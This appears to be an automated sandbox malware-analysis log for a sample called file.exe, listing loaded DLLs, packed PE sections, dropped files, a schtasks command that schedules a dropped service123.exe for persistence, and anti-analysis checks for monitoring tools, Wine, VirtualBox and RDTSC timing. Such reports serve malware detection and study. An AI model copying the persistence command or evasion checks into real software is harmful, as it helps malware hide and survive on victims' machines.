Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dlnashext.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wpdshext.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: unmycipohmxnjqoesrey.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: unmycipohmxnjqoesrey.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: unmycipohmxnjqoesrey.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: unmycipohmxnjqoesrey.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: unmycipohmxnjqoesrey.dll Jump to behavior
Source: file.exe Static file information: File size 4392448 > 1048576
Source: file.exe Static PE information: Raw size of is bigger than: 0x100000 < 0x277800
Source: file.exe Static PE information: Raw size of secyibqm is bigger than: 0x100000 < 0x1b5400
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_009F8230 LoadLibraryA,GetProcAddress,FreeLibrary,PathCchRemoveExtension,GetLastError, 8_2_009F8230
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: file.exe Static PE information: real checksum: 0x431b06 should be: 0x43df3b
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: secyibqm
Source: file.exe Static PE information: section name: jcradwod
Source: file.exe Static PE information: section name: .taggant
Source: service123.exe.0.dr Static PE information: section name: .eh_fram
Source: unmYCIPOHmXNjqOesrEy.dll.0.dr Static PE information: section name: .eh_fram
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_009FA499 push es; iretd 8_2_009FA694
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C190C30 push eax; mov dword ptr [esp], edi 8_2_6C190DAA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C15ED10 push eax; mov dword ptr [esp], ebx 8_2_6C15EE33
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C134E31 push eax; mov dword ptr [esp], ebx 8_2_6C134E45
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C128E7A push edx; mov dword ptr [esp], ebx 8_2_6C128E8E
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C12A947 push eax; mov dword ptr [esp], ebx 8_2_6C12A95B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C15EAB0 push eax; mov dword ptr [esp], ebx 8_2_6C15EBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C130AA2 push eax; mov dword ptr [esp], ebx 8_2_6C130AB6
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C148AA0 push eax; mov dword ptr [esp], ebx 8_2_6C14909F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C132AAC push edx; mov dword ptr [esp], ebx 8_2_6C132AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C162BF0 push eax; mov dword ptr [esp], ebx 8_2_6C162F24
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C162BF0 push edx; mov dword ptr [esp], ebx 8_2_6C162F43
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C128435 push edx; mov dword ptr [esp], ebx 8_2_6C128449
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C148460 push eax; mov dword ptr [esp], ebx 8_2_6C148A5F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C12048B push eax; mov dword ptr [esp], ebx 8_2_6C1204A1
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1204E0 push eax; mov dword ptr [esp], ebx 8_2_6C1206DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C101CFA push eax; mov dword ptr [esp], ebx 8_2_6C1B6622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C101CFA push eax; mov dword ptr [esp], ebx 8_2_6C1B6622
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C12A5A7 push eax; mov dword ptr [esp], ebx 8_2_6C12A5BB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C162620 push eax; mov dword ptr [esp], ebx 8_2_6C162954
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C162620 push edx; mov dword ptr [esp], ebx 8_2_6C162973
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1706B0 push eax; mov dword ptr [esp], ebx 8_2_6C170A4F
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1206A2 push eax; mov dword ptr [esp], ebx 8_2_6C1206DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1386A1 push 890005EAh; ret 8_2_6C1386A9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1206A6 push eax; mov dword ptr [esp], ebx 8_2_6C1206DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1266F3 push edx; mov dword ptr [esp], ebx 8_2_6C126707
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C1206FD push eax; mov dword ptr [esp], ebx 8_2_6C1206DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C12070E push eax; mov dword ptr [esp], ebx 8_2_6C1206DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C12A777 push eax; mov dword ptr [esp], ebx 8_2_6C12A78B
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C130042 push eax; mov dword ptr [esp], ebx 8_2_6C130056
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 8_2_6C0FE0D0 push eax; mov dword ptr [esp], ebx 8_2_6C1B6AF6
Source: file.exe Static PE information: section name: secyibqm entropy: 7.9562618999331445
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\unmYCIPOHmXNjqOesrEy.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe Jump to dropped file

Boot Survival

barindex
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\service123.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\service123.exe Stalling execution: Execution stalls by calling Sleep
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1674D6B second address: 1674D70 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17CF1D7 second address: 17CF1E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FC69CFD56E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17CF1E3 second address: 17CF1E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17CF1E8 second address: 17CF1FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FC69CFD56EEh 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17CF1FD second address: 17CF209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC69D5338F6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17EA6EB second address: 17EA6FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CFD56EEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17EA6FD second address: 17EA70D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D5338FCh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17EA70D second address: 17EA71E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007FC69CFD56E6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17EC531 second address: 17EC53E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17EC53E second address: 17EC542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17EC542 second address: 17EC55A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D533904h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17EC55A second address: 17EC58A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jg 00007FC69CFD56E6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push edx 0x00000011 jg 00007FC69CFD56ECh 0x00000017 pop edx 0x00000018 mov eax, dword ptr [eax] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FC69CFD56ECh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17EC58A second address: 17EC594 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC69D5338F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17EC594 second address: 17EC5B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CFD56F9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17EC5B1 second address: 17EC5CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D5338FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 pop eax 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17EC654 second address: 17EC658 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17EC658 second address: 17EC65E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17EC65E second address: 17EC664 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17EC664 second address: 17EC715 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FC69D533904h 0x0000000f pushad 0x00000010 push edx 0x00000011 pop edx 0x00000012 jbe 00007FC69D5338F6h 0x00000018 popad 0x00000019 popad 0x0000001a nop 0x0000001b xor edi, 537AD6CEh 0x00000021 push 00000000h 0x00000023 push esi 0x00000024 jnl 00007FC69D5338FCh 0x0000002a pop edi 0x0000002b push 42275D70h 0x00000030 jbe 00007FC69D53390Ch 0x00000036 ja 00007FC69D533906h 0x0000003c xor dword ptr [esp], 42275DF0h 0x00000043 mov esi, 69CE8923h 0x00000048 mov esi, 7991646Bh 0x0000004d push 00000003h 0x0000004f add ch, FFFFFFC8h 0x00000052 push 00000000h 0x00000054 mov cx, 648Ch 0x00000058 push 00000003h 0x0000005a jc 00007FC69D53390Fh 0x00000060 jmp 00007FC69D533909h 0x00000065 push AD4472C5h 0x0000006a jns 00007FC69D533904h 0x00000070 push eax 0x00000071 push edx 0x00000072 jng 00007FC69D5338F6h 0x00000078 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17EC7BE second address: 17EC7C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17EC7C7 second address: 17EC7CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17FF6DE second address: 17FF6F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CFD56F4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 17FF6F6 second address: 17FF6FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180DCE2 second address: 180DCF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC69CFD56E6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180BE38 second address: 180BE3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180BFA7 second address: 180BFBF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jns 00007FC69CFD56E6h 0x00000009 jmp 00007FC69CFD56EBh 0x0000000e pop ecx 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180C13D second address: 180C154 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FC69D533900h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180C2BC second address: 180C2C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180C2C2 second address: 180C2D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jg 00007FC69D5338FEh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180C43B second address: 180C455 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CFD56F6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 180C455 second address: 180C47F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69D5338FEh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC69D533906h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
